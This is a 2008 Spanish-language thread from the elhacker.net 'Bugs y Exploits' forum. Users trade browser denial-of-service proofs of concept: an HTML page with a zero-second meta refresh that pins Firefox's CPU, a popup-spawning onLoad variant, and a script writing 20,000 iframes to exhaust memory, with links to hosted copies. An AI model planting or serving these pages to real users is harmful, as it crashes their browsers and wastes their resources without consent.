Firefox niam niam CPU!

Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

Firefox niam niam CPU!

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2

Autor

Tema: Firefox niam niam CPU! (Leído 7,064 veces)

TRICKY

The "Tricky" ..
Colaborador

Desconectado

Mensajes: 1.602

Firefox niam niam CPU!

« en: 18 Octubre 2008, 16:25 »

Que tal.

Bueno escribo para pegaros un "fallito" con el que he dado por casualidad.
El "fallito" es en Firefox ( version 3.0.3, decidme sobre otras, por favor ) y lo que ocurre es que el rpoceso del firefox entra en un loop sin salir jamas de el dado a una cabecera http meta http-equiv="REFRESH" con un content=0.

O sea, un codigo de ejemplo seria algo como:

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Xploit</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="HTML Tidy, see www.w3.org">
<meta http-equiv="REFRESH" content="0">

</head>
<body bgcolor="#FFFFFF"></body>
</html>

Cortad Guardadlo como xploit.html por ejemplo. Tras ello abrelo con firefox y podreis ver como empieza a comerse gran parte de vuestros ciclos de CPU.
Lo podreis ver en el administrador de tareas ( Ctrl+Alt+Del ).

Bueno, crasheo una vez pero si os crashea hacedmelo saber anotando version con la cual se produjo el crash; aunque es improbable que pase..

Saludos.


	En línea

"La envidia es una declaración de inferioridad"
Napoleón.

Axus

Desconectado

Mensajes: 1.937

Mas vale llegar tarde, que nunca llegar

Re: Firefox niam niam CPU!

« Respuesta #1 en: 18 Octubre 2008, 16:43 »

Esto debería ir en Bug y Exploit ::)


	En línea

TRICKY

The "Tricky" ..
Colaborador

Desconectado

Mensajes: 1.602

Re: Firefox niam niam CPU!

« Respuesta #2 en: 18 Octubre 2008, 16:46 »

Que tal.

@ zhyx:

si, la verdad es que ya lo pense, pero al no tratarse de un "bug" ( aun ) no lo considere oportuno pegarlo alli.

Suerte.


	En línea

"La envidia es una declaración de inferioridad"
Napoleón.

Eazy

Desconectado

Mensajes: 229

Eazy [FM-Team]

Re: Firefox niam niam CPU!

« Respuesta #3 en: 18 Octubre 2008, 19:14 »

Código

<!DOCTYPE html
  PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Xploit</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
 
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
      <meta name="generator" content="HTML Tidy, see www.w3.org">
      <meta http-equiv="REFRESH" content="0">
 
   </head>
   <body bgcolor="#FFFFFF"></body>
</html>

Asi se entiende mejor el code, que algun mod lo mueva a bugs y exploits.


	En línea

[/url]

Eazy

Desconectado

Mensajes: 229

Eazy [FM-Team]

Re: Firefox niam niam CPU!

« Respuesta #4 en: 19 Octubre 2008, 02:14 »

Aca esta la PoC con popups, http://eazy.webcindario.com/xxx.html


	En línea

[/url]

Azielito

no es
CoAdmin

Desconectado

Mensajes: 9.114

>.<

Re: Firefox niam niam CPU!

« Respuesta #5 en: 20 Octubre 2008, 18:43 »

Eazy, eso me abrio muchas ventanitas en iexplorer xDD

Código

<!DOCTYPE html
  PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
 
<SCRIPT LANGUAGE="javascript">
<!-- Idea by:  Nic Wolfe -->
<!-- This script and many more are available free online at -->
<!-- The javascript Source!! http://javascript.internet.com -->
 
<!-- Begin
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1,width=600,height=600');");
}
// End -->
</script>
 
 
<!-- STEP TWO: Paste this onLoad event handler into the BODY tag -->
 
<BODY onLoad="javascript:popUp('http://eazy.webcindario.com/xxx.html')">
 
<!-- Script Size:  0.73 KB  -->
 
<title>Xploit</title>
 
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
 
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
      <meta name="generator" content="HTML Tidy, see www.w3.org">
      <meta http-equiv="REFRESH" content="0">
 
   </head>
   <body bgcolor="#FFFFFF"></body>
</html>

Sera por el javascript? xDDDD

dejame ahora probar con firefox ¬¬ si sucede lo mismo tendre que modificar el post XD

Ya regrese, si afecta bastante incluso con el JS desactivado...

pero no pasa nada "extraño" mas que consumir algo de CPU, pero al final no peta =\


« Última modificación: 20 Octubre 2008, 18:52 por Azielito »	En línea

Ejemplo de
Cómo pronunciar

Eazy

Desconectado

Mensajes: 229

Eazy [FM-Team]

Re: Firefox niam niam CPU!

« Respuesta #6 en: 20 Octubre 2008, 20:47 »

Si tenes 512 de ram, con el PoC de las popups si "peta" :xD


	En línea

[/url]

Azielito

no es
CoAdmin

Desconectado

Mensajes: 9.114

>.<

Re: Firefox niam niam CPU!

« Respuesta #7 en: 20 Octubre 2008, 20:52 »

ps yo solo tengo 1gb en ram =\

ya pocos tienen de 512 o es mi imgaginacion xD?


	En línea

Ejemplo de
Cómo pronunciar

Freeze.

Desconectado

Mensajes: 2.731

Re: Firefox niam niam CPU!

« Respuesta #8 en: 21 Octubre 2008, 01:14 »

Es tu imaginación

A mi me salio mil veces el mensajito de "Internet explorer informa que acabo de bloquear 1000 popups. Sr usuario de firefox" :xD


	En línea

http://pssimo.wordpress.com

Azielito

no es
CoAdmin

Desconectado

Mensajes: 9.114

>.<

Re: Firefox niam niam CPU!

« Respuesta #9 en: 21 Octubre 2008, 17:48 »

jahahahahaha esta bueno, no se podra meter en otro tipo de ciclos?


	En línea

Ejemplo de
Cómo pronunciar

Eazy

Desconectado

Mensajes: 229

Eazy [FM-Team]

Re: Firefox niam niam CPU!

« Respuesta #10 en: 21 Octubre 2008, 20:17 »

No creo, pero si no existiera el "Bloqueador de ventanas emergentes" esto estaria muy divertido ^^


	En línea

[/url]

joserra89

Desconectado

Mensajes: 987

"./"

Re: Firefox niam niam CPU!

« Respuesta #11 en: 22 Octubre 2008, 19:05 »

A mi con 2gigas de ram me a tirado el chrome


	En línea

"Sin metodo, sin orden, sin voluntad, no es posible el triunfo"

s E t H

Desconectado

Mensajes: 151

Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.

Re: Firefox niam niam CPU!

« Respuesta #12 en: 23 Octubre 2008, 23:56 »

Código

<html>
<script>
for(a=0; a<20000; a++){
document.write('<iframe src="/firefox.htm" height="1000" width="1000"</iframe>');
}
</script>
</html>

con eso y lo que posteo averno con el nombre "firefox.exe", me quede sin firefox.. y con 1,256 gb de ram

edit: IE me pide confirmaion

edit2:
http://seth.inkt.fdchost.com/bugs/poc/firefox.htm
http://seth.inkt.fdchost.com/bugs/poc/firefox_frame.htm


« Última modificación: 24 Octubre 2008, 00:17 por s E t H »	En línea

escribiendo en 0V3RL04D 1N TH3 N3T y XD Blog!

Mi deviantart

Freeze.

Desconectado

Mensajes: 2.731

Re: Firefox niam niam CPU!

« Respuesta #13 en: 24 Octubre 2008, 03:53 »

Los link del Edit de Seth no abrirlos por favor

:xD


	En línea

http://pssimo.wordpress.com

Micah Genji

Desconectado

Mensajes: 52

learn more to life

Re: Firefox niam niam CPU!

« Respuesta #14 en: 24 Octubre 2008, 04:01 »

Esto si que estuvo bueno


	En línea

Only two things are infinite, the universe and human stupidity, and I'm not sure about the former : A.E

Páginas: [1] 2

Ir a: